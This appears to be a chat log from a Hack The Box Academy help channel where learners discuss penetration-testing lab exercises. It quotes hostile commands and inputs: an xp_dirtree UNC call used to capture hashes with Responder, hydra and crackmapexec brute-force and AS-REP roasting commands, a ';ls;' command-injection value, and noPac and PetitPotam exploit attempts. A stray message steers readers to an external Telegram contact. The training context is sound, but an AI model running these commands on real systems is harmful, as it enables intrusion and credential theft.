#modules
Either the question was not clear or I didn't understand it well. 😅
Thanks for the help with DNS, will be back later because i still don't get results that i can work with.
Unclear question tbh
welcome to the cartel
Time to see how this course compares with Offsec and THM
They're leagues better than offsec (according to those that have done offsec)
I heard offsec course videos are very short and not very clear. Not sure if that's true.
For everyone I've spoken to, they said that the modules are sufficient and do a good job. But for me, I found them overwhelming and insufficient. That's why I'm using HTB
Hi guys, I'm trying to work on my report writing. Is there any module that goes into detail on how to figure out CVSS scores and how to place the vulnerabilities you find?
I'm doing this one and it just skims over how to format it and what's good or bad, but not "if you have x vulnerability you could take these steps to identify its severity", etc.
When we have completed (at least) two modules and are satisfied with our notes and documentation, we can select three different retired machines.
Is it saying to get a VIP so that I can practice after the modules?
i think it says that you can select 3 retired machines to practice on. where does it mention vip?
Oh so I get to select machines for free? That's cool
Time for some enumeration review
Nvm. Still another intro module left "Getting Started"
as soon as i reach hacker rank i think i'll buy it
I don’t think you get to do them for free, it just suggests that if you have vip you can practice on retired machines but ofc that’s optional
You get to do 1 for free
Following a guide, and using the IP, it's just a separate instance of a retired box, i am pretty sure
But no endgame stuff for free ?
I’m working on the Protected Files page of the Password Cracking module.
The question asks to use the cracked password of the user Kira to log into the host and crack the password for the SSH key.
It assumes I have a cracked password for Kira (I don’t). || Should I be using hydra to brute-force ftp mutating the provided pass list in resources or did I miss something? ||
Retired machines require vip
You do have kiras password... you cracked it earlier in the module
Yes it's the same password...
It is in the mutated list from resources
I took several days to work through the PtH and PtT pages so my memory failed me there.
“Kira who?”
Well guess you gotta recheck the module
The linux and windows labs in this module get reused
So keep this in mind for future: save username/password combos
Good practice for reporting. 💯
It's early on iirc one of the first handful of sections
everything else besides active boxes / challenges and the first few boxes on starting point requires vip (prolabs are paid separately)
does anyone here know what an RCE attack is?
Reverse Cringe Encryption
also known as based encryption
Unable to install mysql server in kali. Have tried several youtube videos. Anyone run into this?
You're better off creating a post in #1024429874246590575
I'll give that a go. Thanks
I'm so relieved
I just connected via the VPN for the first exercise and the connection is flawless
This means I will be able to go through this whole course and do boxes without technical issues
Hello all, I'm having big difficulties in the module Active Directory Enumeration & Attacks, Bleeding Edge Vulnerabilities. I tried all 3 exploits, and I get bugs on 2 of them, and with the third (noPac) I can't get the file (my previous message was deleted, I don't understand why)
Probably due to containing spoilers
Can u help me through ?
can u tell us what u were trying to do and what steps have u done?
And cover up spoilers with **
Hello, I want to report a vulnerability to hackthebox. Can an authorized person contact me via LinkedIn?
Please help on question 1 of Attacking MSSQL. I type commands "EXEC master..xp_dirtree '\10.10.110.17\share'
GO" and start responder but don't get hash in responder tun0 ... https://academy.hackthebox.com/module/116/section/1169
did u change the ip address to ur machine?
ye
no
when executing the command does it give any errors?
give it a try, I remember having trouble with getting responder to get the hash
For noPac I get to the shell but I'm limited to the semi-shell, I didn't find any command except ||copy||
For PetitPotam.py exploit I keep getting “200 OK” followed by HTTP headers and HTML in the body.
For Printnightmare, this command ||sudo smbserver.py -smb2support CompData /path/to/backupscript.dll|| doesn't finish, I get a timeout
Try to remove the GO from the end: EXEC master..xp_dirtree '\\10.10.*.*\share\'
Okay one second let me go through my notes
thx u ❤️
do I have to start a share in impacket can't responder work? and if responder method works what is the share? i just type IP only
I type GO on line 2
netdiscover? idk
same
I don't even know anything
OSINT?
no u don't have to have a share, just launch responder, and then type the command without the GO
idk why it doesn't work with the GO tbh
this is my responder command "sudo responder -I tun0" and it not working even with go
Hello, i just redid the question with noPac, I started with the scanner, and then continued with the exploit. it all worked out alright.
Can u walk me through the steps of ur noPac exploit.
Im working on password attacks module, at the Password Mutations section, I mutated the passwords.list with the custom.rule as told, then im trying to bruteforce smb and ssh "sam" user with it but it's taking long. Should I wait?
okay one sec, let's go all over it again.
1: u logged in with mssql.
2: u launched responder.
3: u executed EXEC master..xp_dirtree '\\10.10.*.*\share\
4: and u still haven't gotten the hash?
nmap scan the target and look for other services that u can bruteforce :)
Password reuse is a common thing uk
on line 3 of what you typed mine is `EXEC master..xp_dirtree '\10.10........ no \share\
alright, the only one that I didnt try is ftp I think so I will try with it too
Thanks!
np
it should work as it is, u just fill in ur IP address and it should work...
Yes try that one, you can also bump up the threads to make it run quicker 🙂
Since it's just one host I should not increase threads? Just bruteforce_speed right?
should I remove the quotes for the \IP?
It does work, but I didn't find any command to get the flag, except ||copy|| that ||copies it in the system32 folder||. If u have more commands to share
Threads increase parallel processing (multiple attempts at once) which increases the speed
Any recommendation on how much threads to use?
2
oh okay, so u do get the shell, there's a command in windows called type, it's like cat in linux :)
Welcome on board :)))))
Ok💀
I’m not that smart 😭😭
mate have a look at the fundamental modules on the academy, they will walk you through all the questions you're asking, IP settings are different based on shell/OS
64
we all started somewhere 😄
64 won't work alright, it'll drop a lot
48 is the limit
certain protocols like ssh and rdp trip out with more but hydra will tell you, otherwise i stick on max
You sure about that?
Thanks to everyone for your answers, will do some test to get maximum performance!
yes yes
i tried cranking it up to 64, anything more than 48 and u start getting drops.
Idk why exactly tbh.
How come I got the flag with 64 threads then?
think certain protocols get overwhelmed
Yes it does not work
its very hit or miss
idk tbh, maybe it does vary.
one sec let me check again.
thanks u
np
Try hydra -l sam -P mut_password.list -t 64 ftp://10.129.X.X
The terminal
Are you using pwnbox?
nop
Default terminal in linux
Hello, I am learning BOF. I am stuck in "bad characters" concepts.
I think the "bad characters" will stop the function of the application.
So I need to find out which characters will stop.
Is my idea correct?
Could anyone explain it?
Thanks.
thanks u i ll try again
Thanks, I'm trying!
Doing the RDP and SOCKS Tunneling with SocksOverRDP in pivot, tunneling & port forwarding module and keep getting this error
anytime, if it doesn't work out hmu.
Turn off real time protection
I know your screenshot didn't show but I can 99.9999% guarantee that would be the issue
I have turned it off.
It's separate from defender
I have turned it off
It's a separate error from the one you have responded to. I searched here first and have seen you respond
Then follow the section from top to bottom
I also can't upload a screenshot for whatever reason...fun
Because you haven't linked/verified your main htb account here
It's to prevent mass image spam
This section goes a -> b -> c
C being the question login
no, this is an issue with the very first part importing the dll
let me verify to send a screenshot
i've restarted the machine too
Can you md5sum the zip file you transferred on both your system and the target?
yeah lemme check
yeah, good shout the transfer is messing it up.
will try a different transfer method.
thanks
hello, I made a gobuster for the hidden folders but I don't understand why it doesn't want to show me a download folder. this one more precisely "http://provisions.snoopy.htb/download" I had to go on the internet to see that this file exists on the internet.
Yeah I have been transferring the zips and it's getting weird when I outfile it.
Good ol simple python http server has failed me
Ever since file transfer module had me set up a simple nginx server been using that since
can't it be access over ur local network as well?
it can but I'm also not worried about it too much as I'm only ever on htb vpn and don't open files I didn't download ¯_(ツ)_/¯
If I really wanted to be spook about it I'd change to nat network in vbox instead of bridged
But having it accessible on my local network allows me to verify if it's still running :)
if i have a user in the domain admin group What are the possible ways to get to administrator ??
Okay so re-transfered and sums match
same problem
oh okay nice
Try resetting the box then
done that twice
why would you want administrator when you're domain admin
domain admin = pwned
This is literally the second step "We can then connect to the target using xfreerdp and copy the SocksOverRDPx64.zip file to the target."
which is done, then loading it
Yes and you need to disable both defender and real-time protection OR add it to exclusions
which I have done
Yes because i don't have permission to read the root.txt flag in the Administrators Desktop
Use Google
@barren apex
that's domain user not domain admin
Are you running powershell as admin?
Hell Yeah
Nah
that one was for someone else
As a Print Operator
*not admin
What module are you doing
you need to do some kind of privesc, run whoami /priv and see what privileges you have
Hello everyone I have a little problem and I need direction
Where does my help request go if I request help in a module?
Web proxies in repeating requests i have changed the request from ip=1 to ip=;ls; , in the previous challenge it was in flag.txt. Now it’s giving me the hint that it is in another directory. What i get is
flag.txt
index.html
node_modules
package-lock.json
public
server.is
But where ever i try to go like for example ;cd public; it gives me a bad request i think I’m not approaching this correctly so If anyone can help please
Hi guys, I'm in the "Pivoting, Tunneling, and Port Forwarding" : "Meterpreter Tunneling & Port Forwarding" & according 2 the explanation it doesn't work
some 1 had it 2?
One of the extra commands it gives if it's what I'm thinking you're referring to
I saw a mistake in that module already, so maybe there's another 1 ....
I had 0 issues following along when I did it
Bravo to base please send in air support
now it doesn't....
@fathom pendant any idea
The academy is so vague like use commands bro what commands 😭
Don't know what the question is asking you for
The ones you should have been learning throughout the module
Or at the very least you can try ls public
Probably due to the nature of the command syntax, you can't cd
Are u done the course @fathom pendant if so what was the hardest module(s)
Nope
How many have u completed so far
It is in using web proxies module and the section is repeating requests. Previously it was really easy i just had to intercept a request and then cat the flag.txt file. Now it says Try using request repeating to be able to quickly test commands. With that, try looking for the other flags and the hint is its not in the same directory. They didn’t even teach anything like how to shift between directories or anything they just showed how to repeat requests from history
Half, was forced to take a break
Combine repeating requests with listing directories
That sucks. At least you're not time constrained to finish it. Unless u have a yearly plan or something
You know how to cat a file that isn't in the current directory yeah?
Personally I think windows priv esc was the hardest module in the course
It showed me two commands ;ls; which lists
flag.txt
index.html
node_modules
package-lock.json
public
server.is
Now I all that works is if I cat flag.txt it works. And if try ls public or cd public it gives me a bad request
I'm only 20% done on CPTS but could sense the danger from that module
most people say AD though
Do ls -la
AD shows 7 days that is probably the highest time among the modules idk but I'm thinking I should do Intro to AD before jumping into that but idk
AD is probably hardest if you're completely new because of how much information there was, but it's arguably the best module on Academy I've done so far.
Was AD hard on the exam?
Bad request
Password attacks might also fall in the category of hard because of how grueling those exercises were, even though it wasn't conceptually very difficult
I skipped it lol
Difficult to say
Id say no, but it was interwoven with other parts that I did find hard
Was the course enough or do u recommend also getting VIP to do the recommended boxes after each module?
None in the bug bounty program here?
I completed the course and then immediately started exam the next weekend
0 extra boxes 0 prolabs
Guys
you a pro?
Awesome. How long did it take you to finish the course
I also want to learn hacking
I wouldnt consider so. In my current planned roadmap of skills Im still in the beginner phase.
Took me about 9 months total. I had a couple months spread out where I took a break for life stuff
From where should I start?
But my standards are high. My beginner scale is apparently some others intermediate scale
if system cpts path if web cbbh path
@shut wraith thanks
if you program/script, to me you're at least intermediate before you started
Is that because you took your time or do you think that the course deserves more than 2 months of work time
Both
Can I have your notes that you took throughout the course lol
Ive seen the stars that this field can go, so Im judging by how far it is to reach em
Absolutely not. The entire value of notes is that you make them yourself. Read up on some learning theory stuff.
This is my current notes format
Download obsidian 
Did you use any folder that you transferred over to windows machines which has all the tools for windows exploitation? Or did you get them on the fly during your exam
I have a tool that can download a bunch of scanning tools quickly if you want the link?
Yes please
https://github.com/AFrenchBanana/GaTS
Still a bit of a work in progress but you can quickly download a bunch of exploits, scanning scripts to targets connected to the internet
just need python installed
theres loads of ways to get files to targets
Okay so I download the tools onto my attacker VM
and then I transfer based on operating system
Are there any restrictions against automation in the exam?
someone may correct me, but not that I'm aware of
But I dont want to get used to automation because its not allowed for OSCP
You're allowed enum scripts in OSCP, it's just you're not allowed tools like sqlmap that do stuff for you
Nop there isn't, the CPTS path shows u the manual method of doing everything first, then introduces u to the automated part, so I don't think you'll get used to automation
so i just spent like an hour on a question in the nmap module. turns out, the first command i tried in my kali VM (hyper-v) works perfectly in the pwnbox. Any reason for that?
Command: sudo nmap -sCU -p 53 target
On pwnbox i get the nsid of the DNS, which is the flag that i needed. On my kali vm i get nothing except the UDP port - open and TCP -filtered
theres always a few issues across kali/pwnbox, due to different versions, how they are set up etc
can some 1 help me in "Pivoting, Tunneling, and Port Forwarding" : "Meterpreter Tunneling & Port Forwarding" .....
Right, but if I'm attacking a client (hypothetically), would such an issue occur by using Kali? Or is it some specific HTB thing?
Thanks for the info and for your tool. I'm going to test it out soon
ive been meaning to sit down and add tools to it, will when i get some time and energy
theres multiple ways to enum protocols, knowing a few will help you
I created a payload just as explained in the page I delivered it just as they explained I run it just as they did but nothing happened ....
On the fly, never drop a file on the host unless its necessary
I'm trying 2 make a Meterpreter Session Establishment
is the proxy server running on msf?
exploit 50064 is not in msf for host -2 in this module - https://academy.hackthebox.com/module/115/section/1139
not even go there, it just doesn't work
research how to add an exploit to msf
have you selected the right payload on the multi handler
exactly as they did 1=1
did you set the LHOST correctly, to your VPN ip, not theirs and not your WAN?
the lhost is 0.0.0.0
on the payload is with the vpn
on the payload or MSF?
Change the LHOST to the same
did that already
LHOST and LPORT should match on the payload and multi handler
right...
& yet it doesn't work ...
DM me
.
The exploit was already in the msf path. Just needed to reload_all fyi if anyone gets lazy like me make sure to do this thanks @barren apex
There are several things that you have to do in order
File validation bypass is first
Then checking file
Correct extension bypass
Upload directory location
Give more details at what step are you right now
No way I thought you have to download it and add it manually, that's why I skipped this part 1 week ago
i just uploaded a png image, uploaded correctly, tried to find the location of it so i could validate the codes i want to try but didn't find a way, want to find source code with xss but still i need the location, with burp i didn't find any details about the file too, so basically i am still at the starting point 😅
xss is not the right path here
did you check client side validation ?
In the crackmapexec module, section Asrep. crackmapexec ldap 10.129.204.177 -u userslist.txt -p '' --asreproast asreproast.out, i got this error (SMB 10.129.204.177 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:inlanefreight.htb) (signing:True) (SMBv1:False)
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/krb5/kerberosv5.py", line 61, in sendReceive
    af, socktype, proto, canonname, sa = socket.getaddrinfo(targetHost, 88, 0, socket.SOCK_STREAM)[0]
                                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/socket.py", line 962, in getaddrinfo
    for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
socket.gaierror: [Errno -2] Name or service not known
). Then i found a solution of just adding --kdcHost in the beginning. But it's not working as shown in the module's section.
yes i did, i can bypass it
but the same issue, i cant find page
let me check something
okay
can I dm someone about CrackMapExec: Skills Assessment ?
hey mate, can you help with asrep section of it?
this is my issue
ldap cannot work with an IP address, it uses vhost and you should edit the /etc/hosts file
and the right command should be like that I guess: crackmapexec ldap DC01.INLANEFREIGHT.LOCAL -u userslist.txt -p '' --asreproast asreproast.out
i added it in /etc/hosts and also tried with the domain but same issue
still nothing 😅
ah, i got it . what is wrong.
let me try it
or like that: crackmapexec ldap dc01.inlanefreight.htb -u userslist.txt -p '' --asreproast asreproast.out
upper or lower case letters won't matter too much
Dm me
and tell me if you got it
any one ?
crackmapexec ldap DC01.INLANEFREIGHT.LOCAL -u userslist.txt -p '' --asreproast asreproast.out
SMB DC01.INLANEFREIGHT.LOCAL 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:inlanefreight.htb) (signing:True) (SMBv1:False)
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/impacket/krb5/kerberosv5.py", line 61, in sendReceive
    af, socktype, proto, canonname, sa = socket.getaddrinfo(targetHost, 88, 0, socket.SOCK_STREAM)[0]
                                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/socket.py", line 962, in getaddrinfo
    for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
same
/etc/hosts :
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.204.177 DC01.INLANEFREIGHT.LOCAL

try to make it like that: 10.129.204.177 DC01.INLANEFREIGHT.LOCAL INLANEFREIGHT.LOCAL
okay
msfvenom has an android module doesnt it?
Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
Need some help for this question, I already got the domain admin for the one of the current user, and how could I remote it to DC01
my bad, it worked. I didn't check the domain name, it was .LOCAL. as per the module and previous enumeration it was .HTB. But why do capital letters work and small not?
WinRM?
ive made that mistake so many times lol
Thanks @sleek urchin
i noticed it while adding domain name in /etc/hosts
great, i honestly don't really know but just to be sure I try both
Hey I know i'm not supposed to ask questions here but do I have to download the ovpn file everytime I want to start a new machine?
You are welcome
no, unless you change server
okay, i will keep that in mind.
how...?
either evilwinrm or Enter-PSSession -ComputerName <machine name> -Credential <creds>
did you answer this question ? Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?
Ah alright, whenever I connect to the vpn on kali in virtualbox it doesn't show as connected. It only does this whenever I browse to the htb website in the vm and download the new ovpn file which is like the first step of the box.
But its not really a problem only a minor inconvenience
yes I answered this
make sure you don't have both the vpn and your pwnbox on at the same time
read the #rules, keep asking for things like that and you will get the 👢
so this user has the ability to change any user's password { including DC admin password } without knowing its original password
DC = DC01 or Domain Controller?
after you change the admin password, you are able to login in DC01 and get the flag
DC01
actually it's the same, if I am not mistaken
https://academy.hackthebox.com/achievement/285625/158 this module was fun, wish there was one building upon this one
Once a foothold is gained during an assessment, it may be in scope to move laterally and vertically within a target network. Using one compromised machine to access another is called pivoting and allows us to access networks and resources that are not directly accessible to us through the compromised host. Port forwarding accepts the traffic on ...
anyone can help me out this?
Are you the one from yesterday? Lol
Yeaaaa
Then you should know the answer
Lmfao
could you dm me?? thanks
yo @urban sage you there? sorry for the bugging you but pinged 2 mods yesterday and no one show up to scoop this clown up
With RDP and SOCKS Tunneling with SocksOverRDP is it supposed to go
Attack Host --> Pivot Host - 172.16.5.150 --> RDP to 2nd Pivot Host 172.16.5.19 --> RDP to Target 172.16.6.155
Looks right
Can someone give me a hint for Q Module: Footprinting, DNS, Last question?
@urban sage can you check your DMs pls
still need help for that...
I have added administrator to domain admin group, and it has genericall
but I cannot do Kerberoasting
I have no idea how to get the DC01's administrator username
if you haven't already dm him then it's better to add the reason why you want to, also it's better to take thing like this to #general and maybe also add your screenshot of the other clown there
DM
Yeah I have dmd him with the screenshot
hint run the tool on a ||subdomain||
thx. will use more wordlists then to find the sub
This is driving me insane. Anyone else get this error?
Yeah this was a pain for me
is it a setting I'm missing?
did you run the server exe as admin?
yeah I did
the cmd at the back needs to be on the other host no?
that's the one from the page
same right?
just to be clear are you saying that it needs to run on pivothost 1?
i can't remember the IPs, but the socks over RDP server exe goes on the pivot host, then the GUI one is on the host you want to connect from
Yeah that's what I have
Pivot host1 = sockoverrdp, Pivohost 2 = RDP server.exe + proxifier?
I think I had to close the Portable proxifer a few times and re configure and eventually it dropped in
it was proper glitchy for me
i think it connected for me twice and then disconnected, so i just RDP via the pivot host to get the flag once I knew I had achieved the aim
RDP in a RDP in a RDP lol
RDP inception
Did you ever get this?
I think that means windows is blocking the connection in realtime 👀
so the target is blocking me....fun times
will do this tomorrow I think
thanks for your help
If i remember right....
I'm stuck here too - any hints?
hey guys, I'm stuck with Lab Hard from Password Attack module, I enumerated the target machine and found an RDP port, based on that and the user hint mentioned in the task, i tried to brute force the passwd through CrackmapExec but the mut_password.list doesn't succeed....
what nmap scan did you run
nmap -p- --open -n -Pn -vv ipAddr
after that -sC & -sV
perhaps try UDP
I can't remember exactly, but i think there was an unusual port open somewhere
hmm well, this is the UDP scan with no success
sudo nmap -sU -n -p- --max-retries 1 -vv 100.129.35.82
hi there, I am working on PIVOTING, TUNNELING, AND PORT FORWARDING, section socks 5 tunneling with chisel. The problem I encounter is that I cannot run the freshly compiled chisel because the target system does not have the right libc6 version.
my question: can i compile chisel with the different version needed for the libc6?
I tried that but nothing worked, so I just used another technique
so you can compile with another library version?
No, I used another pivoting technique cuz i couldn't get it to work, then i saw that someone said that it was a problem with the box so idk
What ports have you got open?
I think the new version of chisel has broken the box, and they haven't updated it yet . You can download an older version and it works if I remember right
Hey guys I wish to pursue the cloud security track at HacktheBox which modules should I complete first to begin with simple machines such as streamcloud?
PORT      STATE SERVICE       REASON  VERSION
111/tcp   open  rpcbind       syn-ack 2-4 (RPC #100000)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack
2049/tcp  open  mountd        syn-ack 1-3 (RPC #100005)
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49679/tcp open  msrpc         syn-ack Microsoft Windows RPC
49680/tcp open  msrpc         syn-ack Microsoft Windows RPC
49681/tcp open  msrpc         syn-ack Microsoft Windows RPC
Ah yes, I remember. Have a look at the other services running.
I tried smb with no success as well
I was already downloading ubuntu 20.04 lts :p will try to find a version of chisel as well
Maybe there's something running on a different port 😉
ups I can't see it
Have you looked at the http service?
hmm not
browser or nmap?
Browser. Try and connect to absolutely everything to work out whats running and how you might be able to utilise it
will do
Not Found
HTTP Error 404. The requested resource is not found.
in both http ports
Port 5985?
Which module do you need help with?
yes
let me see if the machine is not responsive
the machine is responding to ping so, it's up
but 5985 not found message
I'm going to reset it
man, I reset the machine and 5985 still not responding
I'm completely lost
I'll load it up quick, bear with
ok.
Check DMS
Compiling with an older linux version did the trick 😄
I have something to show the world, You must see this file. & Start reading from line 30 if you are lazy. on telegram search telegram akberxy. i can't upload it here that's why
for attacking common services > SMTP >Attacking Email Services, how are we supposed to leverage the credentials (the username and password) into logging into the email server? the module doesn't explicitly mention any tool or resource for doing this. i tried using thunderbird and populating the correct fields (mail server/ports/credentials), but i still couldn't access the email server with the correct credentials
The module does mention a means, but the wording could be better. Telnet using the appropriate port
thanks, this worked
Hey, @wispy aspen can you give me some tips on ethical hacking in dms? i have noticed you have a "Pro Hacker" role!
Rank doesn't mean that much. The platform has been out that long that people who played in 2018-2019 had a much easier time than people today (people also frequently cheat).
Not dissing SySinclair or anyone else here though, my point is that simply being here, engaging with people, and actually trying is all you need to learn.
Nah man, I don't know shit, I'm just stubborn and persistent
lol..
Friends i want to make a complaint to the anonymous group..can anyone suggest me the process. And sorry for asking a personal question..it is most important for my life
And for my state too
guys, are the attacking passwords modules' skill assessments supposed to take long to solve?
i've solved the first one quickly but this second one looks like it might be a while before its solved.
Any tips on how to make it faster are appreciated.
No fuck off
looks like i forgot to enumerate the smb share, i think i figured it out.
parrot 5.3 is based on which debian version? and where can i see the docs? thank you
hey guys anybody knows why this SMB command doesn't work, when I type the passwd (brute forced previously ) for the user:
smbclient --user ||j***|| //<ipAddr>
This is from Lab Hard/Password Attack module
smbclient -L //server -U user
then write the prompted password
if it doesn't work use the smbclient.py and read the parameters by doing smbclient.py --help
^
ty
For the SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe) module. I am submitting the date that is being returned, but its invalid?? I am following all the instructions to a T
i haven't done the module but have you tried different time formats?
for example 01012023 instead of 112023
yup
ah then i cant really help you more as you have probably way more experience as i do, i joined like 2 months ago haha
well once u do it let me know
alright
also, sure i may have been in here longer than u but that doesn't mean i know more :) we are all here to help each other !
True, thanks and I'll try to help more people even though I'm just starting, although I can say I'm mid way through cpts in 2 months haha
It's tough but I love it, this platform is really fun, I'm trying to do it in less than 4 months just as a challenge.
Broken Authentication Skills Assessment: https://tenor.com/view/what-why-huh-steve-harvey-confused-gif-17449734
gl!
Doing Pivot Tunnelling Module & The Socks Over RDP challenge keeps stumping me. I keep getting this error and proxifier keeps failing. Does anyone have any idea?
I've reset this lab 3 times & waited 10 mins before connecting etc
Ignore me, my idiocy knows no bounds
You probably have this error because you wrote the wrong IP
where do we find the passwords.txt file for Kerberoasting module in the Attackbox?
in Resources on top of the section
ok thanks
I want to learn how
TCP or UDP payload will be generated
is it possible again to give where im at and what im thinking for whitebox attacks skills assessment to see if im in the ball park?
Sure.
Module: "Getting Started"
Chapter: Public Exploits
Question:
Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
Hint:
Search for plugin exploits
The web app on the host is wordpress. And the hint confirms that the exploit has to do with a wordpress plugin. So I searched on google "wordpress plugin exploit". I also searched on searchsploit and metasploit.
But there are countless results even when I specify the version which is 5.6.1. How do I know which exploit to use? Can you please help.
SOLVED:
The web app says the plugin.
Hey
Hi, can you tell me how you managed to generate dictionaries for user and pass. I'm using cuppa and username_anarchy. I shorten the password dictionary according to the hint and unfortunately I still don't get the right data, besides brute force lasts over an hour.
Hi:)
So for now, I'm dead. I created the dictionaries according to the information and unfortunately nothing goes through. Thanks for the answer
Hi all, I’m on the Using Web Proxies Skills Assessment. I’ve done Q2, 3 and 4 fine but Q1, enabling the disabled button is sticking me. I’ve tried popping getflag=true at the bottom of my request but that doesn’t work, also tried putting it at the top after lucky.php/?. Anyone able to nudge please?
I’m using Inspector to enable it and forwarding that through the proxy to intruder but it just doesn’t seem to like it
Got it, anyone else stuck on this one, you need to click loads in repeater, you aren’t going crazy haha
good morning all
i'm doing the hard lab assessment on the password craccking
i keep getting this error when i try and run lazagne.exe
all tips on how i should run it ?
try .\lazagne.exe all
Hi I wanted to know if anyone could help me out with this: who can help me this https://academy.hackthebox.com/module/116/section/1466
you've posted an entire module, try reviewing the module and asking your question for better guidance
Oh my bad sorry, I was needing help with Attacking Common Services - Easy Lab
What have you tried and what exactly is not working?
Is this stupid I'm trying to transfer LinPeas in base 64 to my target host but it's massive
I tried to start a python server and transfer with wget but I couldn't connect to my attacker vm from the host machine (yes I used tun0 VPN IP )
Are you connected via ssh? You could use scp then
Okay I'll try that. But I'm worried I wont have that option on all boxes
Do you have access to create a file?
Yes
Can you edit that file with vi or nano?
You're right, I should just copy the file since it's not a binary
LinPEAS is a python script
Yes
nvm it is binary
Excited 😄
I would recommend opening up the linpeas.sh in your kali VM, copying its contents, going to your established shell, opening nano, and pasting its contents. If that doesn't work, there is a File Transfers module in HTB Academy with a plethora of options
Hi there, I am learning Linux BOF through the Linux BOF module.
I have solved the Skills Assessment but I have question.
I must use ||./leave_msg payload|| in the bash to get root.
Why can't I get the root when I run the shellcode in the gdb?
so guys.. i found this SSRF vul.. it calls back and it actually dumps the file content.. the system is Windows..
Please any idea on how to exploit this more ?
You can try fetching web server files of the remote server.
which module and section are you on?
A webpage or subdomain that is only accessible to internal users.
Yeah i tried that for ex. it rendered the index.php file but i got no ideas of the files in the web server
I'd suggest you to enumerate more, check your nmap scan. Try fetching something that is running on another port?
tried brute forcing and found nothing
yeah! let me try more
Hey bro! that actually worked
i tried accessing the port 5000 like 10.10.10.239:5000 but i got access denied and then i used the local ip
hello guys
if anyone need a job support ping me guys
Hi, can someone explain the difference between -Pn and --disable-arp-ping?
Hello can someone help. I am user 1 what is the command using su to switch to user 2. This is the output of sudo -l:
ng-519917-gettingstartedprivesc-frc5g-f5b6cf4fc-54kn9:
(user2 : user2) NOPASSWD: /bin/bash
if no password sudo su user2
Thanks I just got it
hello. I am at the Skills Assessment - File Inclusion https://academy.hackthebox.com/module/23/section/513
I am at the RCE part. I am poisoning the log and it isn't working. I managed to change the user agent to an example word but when I try the PHP shell code nothing works and I think it breaks the target and I have to keep resetting.
try with single quotes
how did you know because I am literally trying that right now????
trial and error
Hi, can someone help me with the Window Priv Esc module for the Server Operators section? I got the last part where you get the hashes and I'm trying to pass the hash using psexec. Not sure if im using the right syntax but it doesnt seem to work:
I still can't cat the flag
it keeps going blank and I keep resetting the target
I dont get it, it worked for "&cmd=ls+/" before and now when I try again the same exact way after refreshing the target it goes blank
I tried chatgpt but I don't understand the definition of arp ping. Ping uses ARP well in order to be able to ping the target, if I disable with --disable-arp-ping I no longer have any use for using -Pn
0 idea but running a couple of commands works fine for me
if you don't understand the definition of arp ping just google it
if that's the admin hash then you may want to remove that screenshot due to spoiler
I looked at the nmap doc and didn't understand
OMG it keeps going blank its so STUPID
both of you don't need to add that part here 🤣
but if you have the admin hash try with something like evil-winrm if there is winrm or use cme to confirm there is smb and that's the right hash, also psexec is giving you a connection error
i reset it 20 times going straight to Burp
the only command I am sending is catting the flag
I use single quotes and it goes blank
I tried refreshing it so many times and not touching it except for that one flag
its fucking broke man
just gave it a try and got the flag, still in the same firefox f12
I WANT MY MONEY BACK ITS RIGGED 😭 😭 😭
Your shift key is broken 
You can not hack this way
I read it 2 times but I couldn't understand what the issue is
He is getting blank flag ?
Or no output at all ?
Probably not forwarding the request fully in burpsuite
like a blank admin panel
Man 1 thing about HTB is you need 60% thinking skills to solve a lab
I tried in repeater too
Check repeater output
oh yea i didn't think of that why tf are you looking in the admin panel for the output??
The Response area in Repeater right?
can i DM you?
sure
try the network tab in firefox f12 like i did 🤣
all I get is 500 Internal Server Error
I am done
its always something with these modules
[HELP]
I have noticed that the Penetration Testing Process module has been updated. How can I identify the new additions or easily locate where the updates have been applied?
bro go for a walk and believe me you will figure out
change log
Modules >> Change log
you will see those as not completed
Thanks for your help
Ok
hello guys, I need a hint cuz I'm stuck with the Lab Hard from Password Attack module, let me give you some context what I did so far, I found (brute forced) the password from the user name in the question exercise, with this credential I tried to enumerate SMB : smbclient -L //server -U user obtaining a completely different Path as I got when connect with xfreerdp , this on the one hand.
On the other hand, (once connected to the Win Machine) I found a file which I tried to download it in my attacker machine thru : sudo smbserver.py folder -smb2support /tmp/smbshare getting an authentication error once try to share the file, then I did the same with username & password and, everything was great BUT, the file wasn't shared/downloaded/pasted in my attacker machine, once again I received an error, in this time, the error more or less described the file name was not found and, I'm spelling the file name as is in the windows folder.
Any hint, clue what could be happening or what I'm doing wrong or misunderstanding?
Smb is not gonna give you the same thing because smb works off shared folders
But also
If you do /drive: you can mount a directory to your xfreerdp session
Footprinting?
Almost like I've answered this before
Without context of where you're stuck or what you've tried it's hard to help
Next time include that in your initial ask
It's just how imap is
You should probably select something
Well it looks like nothing is in inbox, but there's another folder for you to try
This is great. Killer share mate. @rustic sage If you give those a good read that should fill any gaps not covered explicitly in the module. 👍
